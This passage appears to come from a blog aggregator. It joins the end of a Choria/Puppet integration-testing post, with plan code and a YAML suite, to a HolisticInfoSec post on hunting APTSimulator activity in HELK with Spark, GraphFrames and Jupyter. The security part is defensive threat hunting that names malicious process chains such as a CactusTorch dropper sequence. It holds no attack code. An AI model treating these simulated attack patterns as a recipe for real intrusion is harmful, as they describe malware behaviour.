  }

  # reads the report from disk and creates a basic overview structure
  cspec::summarize_report($report)
}
```

Here's the cspec::run_suites Playbook that takes data from a Choria data source and drives the suite dynamically:

```puppet
plan cspec::run_suites (
  Hash $ds,
  Boolean $fail_fast = false,
  Stdlib::Absolutepath $report,
) {
  $suites = choria::data("suites", $ds)

  notice(sprintf("Running test suites: %s", $suites.join(", ")))

  choria::data("suites", $ds).each |$suite| {
    choria::run_playbook($suite,
      ds => $ds,
      fail_fast => $fail_fast,
      report => $report
    )
  }
}
```

And finally a YAML file defining the suite. This file describes my AWS environment that I use to do integration tests for Choria, and you can see there's a bunch of other tests here in the suites list; some of them will take data like what nodes to expect etc.
```yaml
suites:
  - cspec::discovery
  - cspec::choria
  - cspec::agents::shell
  - cspec::agents::process
  - cspec::agents::filemgr
  - cspec::agents::nettest

choria.version: mcollective plugin 0.7.0

nettest.fqdn: puppet.choria.example.net
nettest.port: 8140

discovery.all_nodes:
  - archlinux1.choria.example.net
  - centos7.choria.example.net
  - debian9.choria.example.net
  - puppet.choria.example.net
  - ubuntu16.choria.example.net

discovery.mcollective_nodes:
  - archlinux1.choria.example.net
  - centos7.choria.example.net
  - debian9.choria.example.net
  - puppet.choria.example.net
  - ubuntu16.choria.example.net

discovery.filtered_nodes:
  - centos7.choria.example.net
  - puppet.choria.example.net

discovery.fact_filter: operatingsystem=CentOS
```

## Conclusion

So this then is a rather quick walkthrough of extending Puppet in ways many of us would not have seen before. I spent about a day getting this all working, which included figuring out a way to maintain the mutating report state internally etc.; the outcome is a test suite I can run, and it will thoroughly drive a working 5-node network and assert the outcomes against real machines running real software.

I used to have a MCollective integration test suite, but I think this is a LOT nicer, mainly due to the Choria Playbooks and the extensibility of modern Puppet.

```shell
$ mco playbook run cspec::suite --data pwd/suite.yaml --report pwd/report.json
```
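The report the run writes is plain JSON built from the outcome hashes shown earlier. A hedged sketch of what a summary pass like cspec::summarize_report might compute, in Python; the summarize function and its totals are my own illustration, only the testsuite/testcase/assertions field names come from the outcome methods above:

```python
import json

# A sample report mirroring the suite/testcase/assertion structure
# produced by the Ruby outcome methods above (sample data, not real output).
report = {
    "testsuite": "filemgr agent tests",
    "testcases": [
        {"testcase": "Should get file details", "success": True,
         "assertions": [{"kind": "assert_task_success", "success": True}]},
        {"testcase": "Should support touch", "success": False,
         "assertions": [{"kind": "assert_task_data_equals", "success": False}]},
    ],
}

def summarize(report):
    # roll the per-case and per-assertion success flags up into an overview
    cases = report["testcases"]
    asserts = [a for c in cases for a in c["assertions"]]
    return {
        "suite": report["testsuite"],
        "cases": len(cases),
        "failed_cases": sum(1 for c in cases if not c["success"]),
        "assertions": len(asserts),
        "failed_assertions": sum(1 for a in asserts if not a["success"]),
    }

print(json.dumps(summarize(report), indent=2))
```

The real function would read the report from the path passed as $report rather than an in-memory dict.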

The current code for this is on GitHub, along with some Terraform code to stand up a test environment. It's a bit barren right now, but I'll add details in the next few weeks.

### HolisticInfoSec.org

#### toolsmith #132 - The HELK vs APTSimulator - Part 2

Continuing where we left off in The HELK vs APTSimulator - Part 1, I will focus our attention on additional, useful HELK features to aid you in your threat hunting practice. HELK offers Apache Spark, GraphFrames, and Jupyter Notebooks as part of its lab offering. These capabilities scale well beyond a standard ELK stack; this is really where parallel computing and significantly improved processing and analytics take hold. It is a great way to introduce yourself to these technologies, all on a unified platform.

Let me break these down for you a little bit in case you haven't been exposed to these technologies yet. First and foremost, refer to @Cyb3rWard0g's wiki page on how he's designed it for his HELK implementation, as seen in Figure 1.
 Figure 1: HELK Architecture
First, Apache Spark. For HELK, "Elasticsearch-hadoop provides native integration between Elasticsearch and Apache Spark, in the form of an RDD (Resilient Distributed Dataset) (or Pair RDD to be precise) that can read data from Elasticsearch." Per the Apache Spark FAQ, "Spark is a fast and general processing engine compatible with Hadoop data" to deliver "lightning-fast cluster computing."
Second, GraphFrames. From the GraphFrames overview, "GraphFrames is a package for Apache Spark which provides DataFrame-based Graphs. GraphFrames represent graphs: vertices (e.g., users) and edges (e.g., relationships between users). GraphFrames also provide powerful tools for running queries and standard graph algorithms. With GraphFrames, you can easily search for patterns within graphs, find important vertices, and more."
Finally, Jupyter Notebooks to pull it all together.
From Jupyter.org: "The Jupyter Notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. Uses include: data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more." Jupyter Notebooks provide a higher order of analyst/analytics capabilities; if you haven't dipped your toe in that water, this may be your first, best opportunity.
Let's take a look at using Jupyter Notebooks with the data populated to my Docker-based HELK instance as implemented in Part 1. I repopulated my HELK instance with new data from a different, bare metal Windows instance reporting to HELK with Winlogbeat, Sysmon enabled, and looking mighty compromised thanks to @cyb3rops's APTSimulator.
To make use of Jupyter Notebooks, you need your JUPYTER CURRENT TOKEN to access the Jupyter Notebook web interface. It was presented to you when your HELK installation completed, but you can easily retrieve it via sudo docker logs helk-analytics, then copy and paste the URL into your browser to connect for the first time with a token. It will look like this,
http://localhost:8880/?token=3f46301da4cd20011391327647000e8006ee3574cab0b163, as described in the Installation wiki. After browsing to the URL with said token, you can begin at http://localhost:8880/lab, where you should immediately proceed to the Check_Spark_Graphframes_Integrations.ipynb notebook. It's found in the hierarchy menu under training > jupyter_notebooks > getting_started. This notebook is essential to confirming you're ingesting data properly with HELK and that its integrations are fully functioning. Step through it one cell at a time with the play button, allowing each task to complete so as to avoid errors. Remember the above-mentioned Resilient Distributed Dataset? This notebook will create a Spark RDD on top of Elasticsearch using the logs-endpoint-winevent-sysmon-* (Sysmon logs) index as source, and do the same thing with the logs-endpoint-winevent-security-* (Windows Security Event logs) index as source, as seen in Figure 2.
 Figure 2: Windows Security EVT Spark RDD
The notebook will also query your Windows security events via Spark SQL, then print the schema with:
```python
df.printSchema()
```
The result should resemble Figure 3.
 Figure 3: Schema
Assuming all matches with relative consistency in your experiment, let's move on to the Sysmon_ProcessCreate_Graph.ipynb notebook, found in training > jupyter_notebooks. This notebook will again call on the Elasticsearch Sysmon index, create vertices and edges dataframes, then build a GraphFrame graph from those same vertices and edges. Here's a little walk-through.
The v parameter (yes, for vertices) is populated with:
```python
v = df.withColumn("id", df.process_guid).select("id","user_name","host_name","process_parent_name","process_name","action")
v = v.filter(v.action == "processcreate")
```
The top three rows of that result set, shown with v.show(3,truncate=False), appear as Figure 4 in the notebook, with the data from my APTSimulator "victim" system, N2KND-PC.
 Figure 4: WTF, Florian :-)
The epic, uber threat hunter in me believes that APTSimulator created nslookup, 7z, and regedit as processes via cmd.exe. Genius, right? :-)
The e parameter (yes, for edges) is populated with:
```python
e = df.filter(df.action == "processcreate").selectExpr("process_parent_guid as src","process_guid as dst").withColumn("relationship", lit("spawned"))
```
Showing the top three rows of that result set, with e.show(3,truncate=False), produces the source and destination process IDs as it pertains to the spawning relationship.
Now, create a graph from the vertices and edges dataframes as defined in the v & e parameters with g = GraphFrame(v, e). Let's bring it home with a hunt for Process A spawning Process B AND Process B spawning Process C; the code needed, and the result, are seen from the notebook in Figure 5.
 Figure 5: APTSimulator's happy spawn
Oh, yes, APTSimulator fully realized in a nice graph. A great example is seen in cmd.exe spawning wscript.exe, which then spawns rundll32.exe; or cmd.exe spawning powershell.exe and schtasks.exe.
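Conceptually, the two-hop motif behind Figure 5 is just a self-join on the edge list: find every pair of "spawned" edges where the child of one is the parent of the other. A plain-Python sketch of that same chain hunt over a toy spawn edge list (process names stand in for the GUIDs the notebook uses, and the data is made up to mirror the examples above):

```python
# Toy spawn edges: (parent process, child process), mirroring the
# "relationship = spawned" edges built in the notebook.
edges = [
    ("cmd.exe", "wscript.exe"),
    ("wscript.exe", "rundll32.exe"),
    ("cmd.exe", "powershell.exe"),
    ("cmd.exe", "schtasks.exe"),
]

# Two-hop chains: A spawned B AND B spawned C,
# i.e. join the edge list against itself on the middle process.
chains = [(a, b, c)
          for (a, b) in edges
          for (b2, c) in edges
          if b == b2]

for chain in chains:
    print(" > ".join(chain))
# prints: cmd.exe > wscript.exe > rundll32.exe
```

GraphFrames does this join for you, at Spark scale, from a declarative motif pattern instead of an explicit loop.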
Need confirmation? Florian's CactusTorch JS dropper is detailed in Figure 6, specifically cmd.exe > wscript.exe > rundll32.exe.
 Figure 6: APTSimulator source for CactusTorch